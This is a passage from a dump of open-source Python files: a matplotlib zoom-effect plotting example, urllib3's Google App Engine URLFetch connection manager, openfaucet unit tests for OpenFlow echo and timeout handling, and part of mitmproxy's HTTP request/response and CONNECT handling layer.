    trans2 = blended_transform_factory(ax2.transData, ax2.transAxes)
    bbox = Bbox.from_extents(xmin, 0, xmax, 1)
    mybbox1 = TransformedBbox(bbox, trans1)
    mybbox2 = TransformedBbox(bbox, trans2)
    # patches inherit line properties but are drawn translucent and edge-free
    prop_patches=kwargs.copy()
    prop_patches["ec"]="none"
    prop_patches["alpha"]=0.2
    c1, c2, bbox_patch1, bbox_patch2, p = \
        connect_bbox(mybbox1, mybbox2,
                     loc1a=3, loc2a=2, loc1b=4, loc2b=1,
                     prop_lines=kwargs, prop_patches=prop_patches)
    ax1.add_patch(bbox_patch1)
    ax2.add_patch(bbox_patch2)
    ax2.add_patch(c1)
    ax2.add_patch(c2)
    ax2.add_patch(p)
    return c1, c2, bbox_patch1, bbox_patch2, p
def zoom_effect02(ax1, ax2, **kwargs):
    u"""
    ax1 : the main axes
    ax2 : the zoomed axes

    Similar to zoom_effect01. The xmin & xmax will be taken from the
    ax1.viewLim.
    """
    # map ax1's data x-range onto ax2's axes coordinates
    tt = ax1.transScale + (ax1.transLimits + ax2.transAxes)
    trans = blended_transform_factory(ax2.transData, tt)
    mybbox1 = ax1.bbox
    mybbox2 = TransformedBbox(ax1.viewLim, trans)
    # patches inherit line properties but are drawn translucent and edge-free
    prop_patches=kwargs.copy()
    prop_patches["ec"]="none"
    prop_patches["alpha"]=0.2
    c1, c2, bbox_patch1, bbox_patch2, p = \
        connect_bbox(mybbox1, mybbox2,
                     loc1a=3, loc2a=2, loc1b=4, loc2b=1,
                     prop_lines=kwargs, prop_patches=prop_patches)
    ax1.add_patch(bbox_patch1)
    ax2.add_patch(bbox_patch2)
    ax2.add_patch(c1)
    ax2.add_patch(c2)
    ax2.add_patch(p)
    return c1, c2, bbox_patch1, bbox_patch2, p
import matplotlib.pyplot as plt

plt.figure(1, figsize=(5, 5))

# Left column: zoom_effect01 with an explicit (xmin, xmax) highlight range.
ax1 = plt.subplot(221)
ax2 = plt.subplot(212)
# Bug fix: the first limit was set on ax2 and immediately overwritten by the
# next line; it was clearly meant for the main axes ax1 (compare the second
# panel below, where ax1 gets its own x-limits).
ax1.set_xlim(0, 1)
ax2.set_xlim(0, 5)
zoom_effect01(ax1, ax2, 0.2, 0.8)

# Right column: zoom_effect02 takes the highlight range from ax1.viewLim.
ax1 = plt.subplot(222)
ax1.set_xlim(2, 3)
ax2.set_xlim(0, 5)
zoom_effect02(ax1, ax2)

plt.show()
| gpl-2.0 |
heytcass/homeassistant-config | deps/requests/packages/urllib3/contrib/appengine.py | 360 | 7937 | from __future__ import absolute_import
import logging
import os
import warnings
from ..exceptions import (
HTTPError,
HTTPWarning,
MaxRetryError,
ProtocolError,
TimeoutError,
SSLError
)
from ..packages.six import BytesIO
from ..request import RequestMethods
from ..response import HTTPResponse
from ..util.timeout import Timeout
from ..util.retry import Retry
try:
    from google.appengine.api import urlfetch
except ImportError:
    # Not running on App Engine: AppEngineManager.__init__ raises
    # AppEnginePlatformError when urlfetch is None.
    urlfetch = None
# Module-level logger; used for forced-retry diagnostics in urlopen().
log = logging.getLogger(__name__)
class AppEnginePlatformWarning(HTTPWarning):
    """Warning about urllib3 behavior specific to the App Engine sandbox."""
class AppEnginePlatformError(HTTPError):
    """Error raised for URLFetch limitations or misuse on App Engine."""
class AppEngineManager(RequestMethods):
    """
    Connection manager for Google App Engine sandbox applications.

    This manager uses the URLFetch service directly instead of using the
    emulated httplib, and is subject to URLFetch limitations as described in
    the App Engine documentation here:

        https://cloud.google.com/appengine/docs/python/urlfetch

    Notably it will raise an AppEnginePlatformError if:
        * URLFetch is not available.
        * If you attempt to use this on GAEv2 (Managed VMs), as full socket
          support is available.
        * If a request size is more than 10 megabytes.
        * If a response size is more than 32 megabytes.
        * If you use an unsupported request method such as OPTIONS.

    Beyond those cases, it will raise normal urllib3 errors.
    """
    def __init__(self, headers=None, retries=None, validate_certificate=True):
        if not urlfetch:
            raise AppEnginePlatformError(
                "URLFetch is not available in this environment.")
        if is_prod_appengine_mvms():
            raise AppEnginePlatformError(
                "Use normal urllib3.PoolManager instead of AppEngineManager"
                "on Managed VMs, as using URLFetch is not necessary in "
                "this environment.")
        warnings.warn(
            "urllib3 is using URLFetch on Google App Engine sandbox instead "
            "of sockets. To use sockets directly instead of URLFetch see "
            "https://urllib3.readthedocs.io/en/latest/contrib.html.",
            AppEnginePlatformWarning)
        RequestMethods.__init__(self, headers)
        self.validate_certificate = validate_certificate
        self.retries = retries or Retry.DEFAULT
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Return False to re-raise any potential exceptions
        return False
    def urlopen(self, method, url, body=None, headers=None,
                retries=None, redirect=True, timeout=Timeout.DEFAULT_TIMEOUT,
                **response_kw):
        """Issue a request via URLFetch, translating its exceptions and
        response object into their urllib3 equivalents."""
        retries = self._get_retries(retries, redirect)
        try:
            response = urlfetch.fetch(
                url,
                payload=body,
                method=method,
                headers=headers or {},
                allow_truncated=False,
                follow_redirects=(
                    redirect and
                    retries.redirect != 0 and
                    retries.total),
                deadline=self._get_absolute_timeout(timeout),
                validate_certificate=self.validate_certificate,
            )
        except urlfetch.DeadlineExceededError as e:
            raise TimeoutError(self, e)
        except urlfetch.InvalidURLError as e:
            # URLFetch reports oversized requests as invalid URLs
            if 'too large' in str(e):
                raise AppEnginePlatformError(
                    "URLFetch request too large, URLFetch only "
                    "supports requests up to 10mb in size.", e)
            raise ProtocolError(e)
        except urlfetch.DownloadError as e:
            if 'Too many redirects' in str(e):
                raise MaxRetryError(self, url, reason=e)
            raise ProtocolError(e)
        except urlfetch.ResponseTooLargeError as e:
            raise AppEnginePlatformError(
                "URLFetch response too large, URLFetch only supports"
                "responses up to 32mb in size.", e)
        except urlfetch.SSLCertificateError as e:
            raise SSLError(e)
        except urlfetch.InvalidMethodError as e:
            raise AppEnginePlatformError(
                "URLFetch does not support method: %s" % method, e)
        http_response = self._urlfetch_response_to_http_response(
            response, **response_kw)
        # Check for redirect response
        if (http_response.get_redirect_location() and
                retries.raise_on_redirect and redirect):
            raise MaxRetryError(self, url, "too many redirects")
        # Check if we should retry the HTTP response.
        if retries.is_forced_retry(method, status_code=http_response.status):
            retries = retries.increment(
                method, url, response=http_response, _pool=self)
            log.info("Forced retry: %s", url)
            retries.sleep()
            return self.urlopen(
                method, url,
                body=body, headers=headers,
                retries=retries, redirect=redirect,
                timeout=timeout, **response_kw)
        return http_response
    def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw):
        """Convert a URLFetch response object into an urllib3 HTTPResponse."""
        if is_prod_appengine():
            # Production GAE handles deflate encoding automatically, but does
            # not remove the encoding header.
            content_encoding = urlfetch_resp.headers.get('content-encoding')
            if content_encoding == 'deflate':
                del urlfetch_resp.headers['content-encoding']
        transfer_encoding = urlfetch_resp.headers.get('transfer-encoding')
        # We have a full response's content,
        # so let's make sure we don't report ourselves as chunked data.
        if transfer_encoding == 'chunked':
            encodings = transfer_encoding.split(",")
            encodings.remove('chunked')
            urlfetch_resp.headers['transfer-encoding'] = ','.join(encodings)
        return HTTPResponse(
            # In order for decoding to work, we must present the content as
            # a file-like object.
            body=BytesIO(urlfetch_resp.content),
            headers=urlfetch_resp.headers,
            status=urlfetch_resp.status_code,
            **response_kw
        )
    def _get_absolute_timeout(self, timeout):
        """Flatten a Timeout object into the single deadline URLFetch accepts."""
        if timeout is Timeout.DEFAULT_TIMEOUT:
            return 5  # 5s is the default timeout for URLFetch.
        if isinstance(timeout, Timeout):
            if timeout._read is not timeout._connect:
                warnings.warn(
                    "URLFetch does not support granular timeout settings, "
                    "reverting to total timeout.", AppEnginePlatformWarning)
            return timeout.total
        return timeout
    def _get_retries(self, retries, redirect):
        """Normalize *retries* to a Retry object, warning about knobs
        URLFetch cannot honor."""
        if not isinstance(retries, Retry):
            retries = Retry.from_int(
                retries, redirect=redirect, default=self.retries)
        if retries.connect or retries.read or retries.redirect:
            warnings.warn(
                "URLFetch only supports total retries and does not "
                "recognize connect, read, or redirect retry parameters.",
                AppEnginePlatformWarning)
        return retries
def is_appengine():
    """Return True when running on any flavor of Google App Engine."""
    # Short-circuit over the individual environment checks.
    for check in (is_local_appengine, is_prod_appengine,
                  is_prod_appengine_mvms):
        if check():
            return True
    return False
def is_appengine_sandbox():
    """Return True for sandboxed App Engine runtimes (i.e. not Managed VMs)."""
    return is_appengine() and not is_prod_appengine_mvms()
def is_local_appengine():
    """Return True when running under the App Engine development server."""
    env = os.environ
    if 'APPENGINE_RUNTIME' not in env:
        return False
    # NOTE: like the original, this raises KeyError if APPENGINE_RUNTIME is
    # set but SERVER_SOFTWARE is not.
    return 'Development/' in env['SERVER_SOFTWARE']
def is_prod_appengine():
    """Return True on the production App Engine runtime (excluding MVMs)."""
    env = os.environ
    if 'APPENGINE_RUNTIME' not in env:
        return False
    if 'Google App Engine/' not in env['SERVER_SOFTWARE']:
        return False
    return not is_prod_appengine_mvms()
def is_prod_appengine_mvms():
    """Return True when running on an App Engine Managed VM."""
    # Absent GAE_VM compares unequal to 'true' either way, so the explicit
    # False default of the original is unnecessary.
    return os.environ.get('GAE_VM') == 'true'
| mit |
rlenglet/openfaucet | src/openfaucet/test_ofprotoops.py | 1 | 11805 | # Copyright 2011 Midokura KK
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittests for ofprotoops.py.
"""
import struct
import unittest2
import weakref
import twisted.internet.address
import twisted.internet.error
import twisted.python.failure
from openfaucet import ofproto
from openfaucet import ofprotoops
from openfaucet import mock_ofproto
from openfaucet import mock_twisted
from openfaucet import mock_vendor
class TestOpenflowProtocolOperations(unittest2.TestCase):
    """Tests for OpenflowProtocolOperations using a mock reactor and a
    mock peer protocol wired back-to-back through loopback transports."""
    def setUp(self):
        # Mock reactor whose clock is advanced manually, so timeouts and
        # periodic echo operations fire deterministically.
        self.reactor = mock_twisted.MockReactorTime()
        self.default_op_timeout = 3
        self.echo_op_period = 5
        self.peerproto = mock_ofproto.MockOpenflowProtocolHandler()
        self.peer_vendor_handler = mock_vendor.MockVendorHandler()
        self.peerproto.vendor_handlers = (self.peer_vendor_handler,)
        self.peer_vendor_handler.protocol = weakref.ref(self.peerproto)
        self.proto = ofprotoops.OpenflowProtocolOperations()
        self.vendor_handler = mock_vendor.MockVendorHandler()
        self.proto.vendor_handlers = (self.vendor_handler,)
        self.vendor_handler.protocol = weakref.ref(self.proto)
        self.proto.reactor = self.reactor
        self.proto.default_op_timeout = self.default_op_timeout
        self.proto.echo_op_period = self.echo_op_period
        host_address = twisted.internet.address.IPv4Address(
            'TCP', '192.168.1.1', '14123')
        peer_address = twisted.internet.address.IPv4Address(
            'TCP', '192.168.1.2', '14567')
        # Wire the two protocols together through loopback transports, so
        # everything self.proto sends is decoded by the mock peer.
        self.proto.transport = mock_ofproto.LoopbackTransport(
            self.peerproto, host_address, peer_address)
        self.peerproto.transport = mock_ofproto.LoopbackTransport(
            self.proto, peer_address, host_address)
        self.peerproto.connectionMade()
    def _get_next_sent_message(self):
        """Get the decoded next message sent by the protocol.

        Returns:
            A tuple describing a single message, or None if no message
            was sent.
        """
        calls_made = self.peerproto.calls_made
        if not calls_made:
            return None
        m = calls_made[0]
        self.peerproto.calls_made = calls_made[1:]
        return m
    def test_connection_made_send_hello_echo_request(self):
        """On connection, OFPT_HELLO then OFPT_ECHO_REQUEST are sent."""
        self.proto.connectionMade()
        # Sent initial OFPT_HELLO with XID 0.
        self.assertTupleEqual(('handle_hello',),
                              self._get_next_sent_message())
        # Sent initial OFPT_ECHO_REQUEST with XID 0.
        self.assertEqual('handle_echo_request',
                         self._get_next_sent_message()[0])
    def test_connection_lost_ops_timeout(self):
        """Losing the connection cancels all pending operation timeouts."""
        self.proto.connectionMade()
        self._get_next_sent_message()  # Initial OFPT_HELLO.
        self._get_next_sent_message()  # Initial OFPT_ECHO_REQUEST.
        # Send 2 more echo requests.
        self.proto._echo()
        self.proto._echo()
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(1,),
                kw={}),
             mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(2,),
                kw={}),
             ], self.reactor.delayed_calls)
        self.proto.connectionLost(twisted.python.failure.Failure(
            twisted.internet.error.ConnectionLost()))
        self.assertItemsEqual([], self.reactor.delayed_calls)
    def test_echo_op_periodic(self):
        """Echo operations repeat periodically after each successful reply."""
        self.proto.connectionMade()
        self._get_next_sent_message()  # Initial OFPT_HELLO.
        # Initial OFPT_ECHO_REQUEST with XID 0.
        next_msg = self._get_next_sent_message()
        self.assertEqual('handle_echo_request', next_msg[0])
        self.assertEqual(0, next_msg[1])
        data = next_msg[2]  # 32-byte random data
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             ], self.reactor.delayed_calls)
        # Receive the reply after 2s, before timeout.
        self.reactor.increment_time(2)
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             ], self.reactor.delayed_calls)
        self.peerproto.send_echo_reply(0, (data,))
        # The timeout call was replaced by the next scheduled echo.
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.reactor.seconds() + self.echo_op_period,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._echo,
                args=(),
                kw={}),
             ], self.reactor.delayed_calls)
        # Next OFPT_ECHO_REQUEST with XID 1.
        self.reactor.increment_time(self.echo_op_period)
        next_msg = self._get_next_sent_message()
        self.assertEqual('handle_echo_request', next_msg[0])
        self.assertEqual(1, next_msg[1])
        data = next_msg[2]  # 32-byte random data
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.reactor.seconds() + self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(1,),
                kw={}),
             ], self.reactor.delayed_calls)
    def test_echo_op_timeout(self):
        """An unanswered echo request closes the connection on timeout."""
        self.proto.connectionMade()
        self._get_next_sent_message()  # Initial OFPT_HELLO.
        # Initial OFPT_ECHO_REQUEST with XID 0.
        next_msg = self._get_next_sent_message()
        self.assertEqual('handle_echo_request', next_msg[0])
        self.assertEqual(0, next_msg[1])
        data = next_msg[2]  # 32-byte random data
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             ], self.reactor.delayed_calls)
        self.assertTrue(self.proto.transport.open)  # Connection open.
        # Let the echo operation time out.
        self.reactor.increment_time(self.default_op_timeout)
        self.assertFalse(self.proto.transport.open)  # Connection closed.
    def test_echo_op_wrong_data(self):
        """An echo reply with the wrong payload is ignored without error."""
        self.proto.connectionMade()
        self._get_next_sent_message()  # Initial OFPT_HELLO.
        # Initial OFPT_ECHO_REQUEST with XID 0.
        next_msg = self._get_next_sent_message()
        self.assertEqual('handle_echo_request', next_msg[0])
        self.assertEqual(0, next_msg[1])
        data = next_msg[2]  # 32-byte random data
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             ], self.reactor.delayed_calls)
        # Receive the reply with wrong data, after 2s, before timeout.
        self.reactor.increment_time(2)
        self.assertItemsEqual(
            [mock_twisted.MockDelayedCall(
                reactor_time=self.reactor,
                time=self.default_op_timeout,
                already_cancelled=False,
                already_called=False,
                callable=self.proto._timeout_operation,
                args=(0,),
                kw={}),
             ], self.reactor.delayed_calls)
        self.peerproto.send_echo_reply(0, ('garbage' + data,))
        # No error message sent back, as this is not a standard error.
        self.assertIsNone(self._get_next_sent_message())
    def test_handle_echo_request(self):
        """An incoming echo request is answered with an echoing reply."""
        self.proto.connectionMade()
        self._get_next_sent_message()  # Initial OFPT_HELLO.
        self._get_next_sent_message()  # Initial OFPT_ECHO_REQUEST.
        self.peerproto.send_echo_request(4, ('abcdefgh',))
        # Sent back an OFPT_ECHO_REPLY with same length, data, and XID 4.
        self.assertEqual(('handle_echo_reply', 4, 'abcdefgh'),
                         self._get_next_sent_message())
class TestOpenflowProtocolOperationsFactory(unittest2.TestCase):
    """Tests that the factory passes its configuration on to the
    protocol instances it builds."""
    def setUp(self):
        self.vendor_handler_classes = (mock_vendor.MockVendorHandler,)
        self.reactor = mock_twisted.MockReactorTime()
        self.factory = ofprotoops.OpenflowProtocolOperationsFactory(
            protocol=ofprotoops.OpenflowProtocolOperations,
            error_data_bytes=64, vendor_handlers=self.vendor_handler_classes,
            reactor=self.reactor, default_op_timeout=4.0, echo_op_period=6.0)
        self.addr = twisted.internet.address.IPv4Address('TCP', '192.168.1.1',
                                                         '14123')
    def test_build_protocol_reactor(self):
        """Built protocols receive the factory's reactor."""
        self.factory.doStart()
        proto = self.factory.buildProtocol(self.addr)
        self.assertEqual(self.reactor, proto.reactor)
        self.factory.doStop()
    def test_build_protocol_default_op_timeout(self):
        """Built protocols receive the factory's default operation timeout."""
        self.factory._default_op_timeout = 42.0
        self.factory.doStart()
        proto = self.factory.buildProtocol(self.addr)
        self.assertEqual(42.0, proto.default_op_timeout)
        self.factory.doStop()
    def test_build_protocol_echo_op_period(self):
        """Built protocols receive the factory's echo operation period."""
        self.factory._echo_op_period = 42.0
        self.factory.doStart()
        proto = self.factory.buildProtocol(self.addr)
        self.assertEqual(42.0, proto.echo_op_period)
        self.factory.doStop()
if __name__ == '__main__':
    # Disable logging during unittests.
    import logging
    logging.basicConfig(level=logging.CRITICAL)
    #logging.basicConfig(level=logging.DEBUG,
    #                    format='%(asctime)s %(levelname)s %(message)s',
    #                    filename='unittest.log',
    #                    filemode='w')
    # Run every TestCase defined in this module.
    unittest2.main()
| apache-2.0 |
ddworken/mitmproxy | mitmproxy/proxy/protocol/http.py | 1 | 19394 | import h2.exceptions
import time
import enum
from mitmproxy import connections # noqa
from mitmproxy import exceptions
from mitmproxy import http
from mitmproxy import flow
from mitmproxy.proxy.protocol import base
from mitmproxy.proxy.protocol.websocket import WebSocketLayer
from mitmproxy.net import websockets
class _HttpTransmissionLayer(base.Layer):
    """Abstract transport layer for reading and writing HTTP messages.

    Concrete subclasses implement the HTTP/1 and HTTP/2 wire formats;
    the stubs below define the interface they must provide.
    """
    def read_request_headers(self, flow):
        raise NotImplementedError()
    def read_request_body(self, request):
        raise NotImplementedError()
    def send_request(self, request):
        raise NotImplementedError()
    def read_response_headers(self):
        raise NotImplementedError()
    def read_response_body(self, request, response):
        raise NotImplementedError()
        # The unreachable yield makes this stub a generator function, so it
        # matches the iterable interface of the concrete implementations.
        yield "this is a generator"  # pragma: no cover
    def read_response(self, request):
        """Read a complete response: headers plus a fully buffered body."""
        response = self.read_response_headers()
        response.data.content = b"".join(
            self.read_response_body(request, response)
        )
        return response
    def send_response(self, response):
        """Send a complete (non-streamed) response; content must be set."""
        if response.data.content is None:
            raise exceptions.HttpException("Cannot assemble flow with missing content")
        self.send_response_headers(response)
        self.send_response_body(response, [response.data.content])
    def send_response_headers(self, response):
        raise NotImplementedError()
    def send_response_body(self, response, chunks):
        raise NotImplementedError()
    def check_close_connection(self, f):
        raise NotImplementedError()
class ConnectServerConnection:
    """
    "Fake" ServerConnection to represent state after a CONNECT request to an upstream proxy.
    """
    def __init__(self, address, ctx):
        self.address = address
        self._ctx = ctx
    @property
    def via(self):
        """The real upstream-proxy connection this one tunnels through."""
        return self._ctx.server_conn
    def __getattr__(self, item):
        # Delegate all unknown attribute access to the real connection.
        return getattr(self.via, item)
    def connected(self):
        return self.via.connected()
class UpstreamConnectLayer(base.Layer):
    """Layer that tunnels traffic through an upstream proxy via CONNECT."""
    def __init__(self, ctx, connect_request):
        super().__init__(ctx)
        self.connect_request = connect_request
        self.server_conn = ConnectServerConnection(
            (connect_request.host, connect_request.port),
            self.ctx
        )
    def __call__(self):
        layer = self.ctx.next_layer(self)
        layer()
    def _send_connect_request(self):
        """Issue the CONNECT request to the upstream proxy and verify it
        was accepted (any non-200 status aborts the tunnel)."""
        self.log("Sending CONNECT request", "debug", [
            "Proxy Server: {}".format(self.ctx.server_conn.address),
            "Connect to: {}:{}".format(self.connect_request.host, self.connect_request.port)
        ])
        self.send_request(self.connect_request)
        resp = self.read_response(self.connect_request)
        if resp.status_code != 200:
            raise exceptions.ProtocolException("Reconnect: Upstream server refuses CONNECT request")
    def connect(self):
        """(Re)connect to the upstream proxy and re-establish the tunnel."""
        if not self.server_conn.connected():
            self.ctx.connect()
            self._send_connect_request()
        else:
            pass  # swallow the message
    def change_upstream_proxy_server(self, address):
        """Switch to a different upstream proxy for subsequent requests."""
        self.log("Changing upstream proxy to {} (CONNECTed)".format(repr(address)), "debug")
        if address != self.server_conn.via.address:
            self.ctx.set_server(address)
    def set_server(self, address):
        """Retarget the tunnel at *address*, dropping any open connection."""
        if self.ctx.server_conn.connected():
            self.ctx.disconnect()
        self.connect_request.host = address[0]
        self.connect_request.port = address[1]
        self.server_conn.address = address
def is_ok(status):
    """Return True for 2xx (success) HTTP status codes."""
    return status >= 200 and status < 300
class HTTPMode(enum.Enum):
    """Proxy operation modes relevant to the HTTP layer."""
    regular = 1
    transparent = 2
    upstream = 3
# At this point, we see only a subset of the proxy modes
# Maps each proxy mode to the HTTP request-line forms (RFC 7230 section 5.3)
# that clients may legitimately send in that mode.
MODE_REQUEST_FORMS = {
    HTTPMode.regular: ("authority", "absolute"),
    HTTPMode.transparent: ("relative",),
    HTTPMode.upstream: ("authority", "absolute"),
}
def validate_request_form(mode, request):
    """Raise ``exceptions.HttpException`` if the request's first-line
    form is not acceptable for the given proxy *mode*."""
    form = request.first_line_format
    if form == "absolute" and request.scheme != "http":
        raise exceptions.HttpException(
            "Invalid request scheme: %s" % request.scheme
        )
    allowed_request_forms = MODE_REQUEST_FORMS[mode]
    if form in allowed_request_forms:
        return
    if mode == HTTPMode.transparent:
        err_message = (
            """
                Mitmproxy received an {} request even though it is not running
                in regular mode. This usually indicates a misconfiguration,
                please see the mitmproxy mode documentation for details.
                """
        ).format("HTTP CONNECT" if form == "authority" else "absolute-form")
    else:
        err_message = "Invalid HTTP request form (expected: %s, got: %s)" % (
            " or ".join(allowed_request_forms), form
        )
    raise exceptions.HttpException(err_message)
class HttpLayer(base.Layer):
    """Proxy layer implementing the HTTP request/response cycle.

    Repeatedly reads a request from the client, forwards it upstream,
    relays the response, and hands off to other layers for CONNECT
    handling, WebSocket upgrades, and other protocol switches.
    """
    if False:
        # mypy type hints
        server_conn = None  # type: connections.ServerConnection
    def __init__(self, ctx, mode):
        super().__init__(ctx)
        self.mode = mode
        self.__initial_server_conn = None
        "Contains the original destination in transparent mode, which needs to be restored"
        "if an inline script modified the target server for a single http request"
        # We cannot rely on server_conn.tls_established,
        # see https://github.com/mitmproxy/mitmproxy/issues/925
        self.__initial_server_tls = None
        # Requests happening after CONNECT do not need Proxy-Authorization headers.
        self.connect_request = False
    def __call__(self):
        """Serve HTTP flows on this connection until the client is done."""
        if self.mode == HTTPMode.transparent:
            self.__initial_server_tls = self.server_tls
            self.__initial_server_conn = self.server_conn
        while True:
            flow = http.HTTPFlow(
                self.client_conn,
                self.server_conn,
                live=self,
                mode=self.mode.name
            )
            # _process_flow returns False when the connection should close.
            if not self._process_flow(flow):
                return
    def handle_regular_connect(self, f):
        """Answer a CONNECT request in regular mode and hand off to the
        next layer (e.g. TLS passthrough or interception).  Always
        returns False: this connection is done with plain HTTP."""
        self.connect_request = True
        try:
            self.set_server((f.request.host, f.request.port))
            if f.response:
                resp = f.response
            else:
                resp = http.make_connect_response(f.request.data.http_version)
            self.send_response(resp)
            if is_ok(resp.status_code):
                layer = self.ctx.next_layer(self)
                layer()
        except (
            exceptions.ProtocolException, exceptions.NetlibException
        ) as e:
            # HTTPS tasting means that ordinary errors like resolution
            # and connection errors can happen here.
            self.send_error_response(502, repr(e))
            f.error = flow.Error(str(e))
            self.channel.ask("error", f)
            return False
        return False
    def handle_upstream_connect(self, f):
        """Forward a CONNECT request to the upstream proxy and, on
        success, switch to an UpstreamConnectLayer tunnel."""
        # if the user specifies a response in the http_connect hook, we do not connect upstream here.
        # https://github.com/mitmproxy/mitmproxy/pull/2473
        if not f.response:
            self.establish_server_connection(
                f.request.host,
                f.request.port,
                f.request.scheme
            )
            self.send_request(f.request)
            f.response = self.read_response_headers()
            f.response.data.content = b"".join(
                self.read_response_body(f.request, f.response)
            )
        self.send_response(f.response)
        if is_ok(f.response.status_code):
            layer = UpstreamConnectLayer(self, f.request)
            return layer()
        return False
    def _process_flow(self, f):
        """Handle one complete request/response exchange.

        Returns True if the connection should be kept alive for another
        request, False if it must be closed.
        """
        try:
            try:
                request = self.read_request_headers(f)
            except exceptions.HttpReadDisconnect:
                # don't throw an error for disconnects that happen
                # before/between requests.
                return False
            f.request = request
            if request.first_line_format == "authority":
                # The standards are silent on what we should do with a CONNECT
                # request body, so although it's not common, it's allowed.
                f.request.data.content = b"".join(
                    self.read_request_body(f.request)
                )
                f.request.timestamp_end = time.time()
                self.channel.ask("http_connect", f)
                if self.mode is HTTPMode.regular:
                    return self.handle_regular_connect(f)
                elif self.mode is HTTPMode.upstream:
                    return self.handle_upstream_connect(f)
                else:
                    msg = "Unexpected CONNECT request."
                    self.send_error_response(400, msg)
                    raise exceptions.ProtocolException(msg)
            validate_request_form(self.mode, request)
            self.channel.ask("requestheaders", f)
            # Re-validate request form in case the user has changed something.
            validate_request_form(self.mode, request)
            if request.headers.get("expect", "").lower() == "100-continue":
                # TODO: We may have to use send_response_headers for HTTP2
                # here.
                self.send_response(http.expect_continue_response)
                request.headers.pop("expect")
            if f.request.stream:
                f.request.data.content = None
            else:
                f.request.data.content = b"".join(self.read_request_body(request))
            request.timestamp_end = time.time()
        except exceptions.HttpException as e:
            # We optimistically guess there might be an HTTP client on the
            # other end
            self.send_error_response(400, repr(e))
            # Request may be malformed at this point, so we unset it.
            f.request = None
            f.error = flow.Error(str(e))
            self.channel.ask("error", f)
            raise exceptions.ProtocolException(
                "HTTP protocol error in client request: {}".format(e)
            )
        self.log("request", "debug", [repr(request)])
        # set first line format to relative in regular mode,
        # see https://github.com/mitmproxy/mitmproxy/issues/1759
        if self.mode is HTTPMode.regular and request.first_line_format == "absolute":
            request.first_line_format = "relative"
        # update host header in reverse proxy mode
        if self.config.options.mode.startswith("reverse:") and not self.config.options.keep_host_header:
            f.request.host_header = self.config.upstream_server.address[0]
        # Determine .scheme, .host and .port attributes for inline scripts. For
        # absolute-form requests, they are directly given in the request. For
        # authority-form requests, we only need to determine the request
        # scheme. For relative-form requests, we need to determine host and
        # port as well.
        if self.mode is HTTPMode.transparent:
            # Setting request.host also updates the host header, which we want
            # to preserve
            host_header = f.request.host_header
            f.request.host = self.__initial_server_conn.address[0]
            f.request.port = self.__initial_server_conn.address[1]
            f.request.host_header = host_header  # set again as .host overwrites this.
            f.request.scheme = "https" if self.__initial_server_tls else "http"
        self.channel.ask("request", f)
        try:
            if websockets.check_handshake(request.headers) and websockets.check_client_version(request.headers):
                # We only support RFC6455 with WebSocket version 13
                # allow inline scripts to manipulate the client handshake
                self.channel.ask("websocket_handshake", f)
            if not f.response:
                self.establish_server_connection(
                    f.request.host,
                    f.request.port,
                    f.request.scheme
                )
                try:
                    self.send_request_headers(f.request)
                except exceptions.NetlibException as e:
                    self.log(
                        "server communication error: %s" % repr(e),
                        level="debug"
                    )
                    # In any case, we try to reconnect at least once. This is
                    # necessary because it might be possible that we already
                    # initiated an upstream connection after clientconnect that
                    # has already been expired, e.g consider the following event
                    # log:
                    # > clientconnect (transparent mode destination known)
                    # > serverconnect (required for client tls handshake)
                    # > read n% of large request
                    # > server detects timeout, disconnects
                    # > read (100-n)% of large request
                    # > send large request upstream
                    if isinstance(e, exceptions.Http2ProtocolException):
                        # do not try to reconnect for HTTP2
                        raise exceptions.ProtocolException(
                            "First and only attempt to get response via HTTP2 failed."
                        )
                    self.disconnect()
                    self.connect()
                    self.send_request_headers(f.request)
                # This is taken out of the try except block because when streaming
                # we can't send the request body while retrying as the generator gets exhausted
                if f.request.stream:
                    chunks = self.read_request_body(f.request)
                    if callable(f.request.stream):
                        chunks = f.request.stream(chunks)
                    self.send_request_body(f.request, chunks)
                else:
                    self.send_request_body(f.request, [f.request.data.content])
                f.response = self.read_response_headers()
                # call the appropriate script hook - this is an opportunity for
                # an inline script to set f.stream = True
                self.channel.ask("responseheaders", f)
                if f.response.stream:
                    f.response.data.content = None
                else:
                    f.response.data.content = b"".join(
                        self.read_response_body(f.request, f.response)
                    )
                f.response.timestamp_end = time.time()
                # no further manipulation of self.server_conn beyond this point
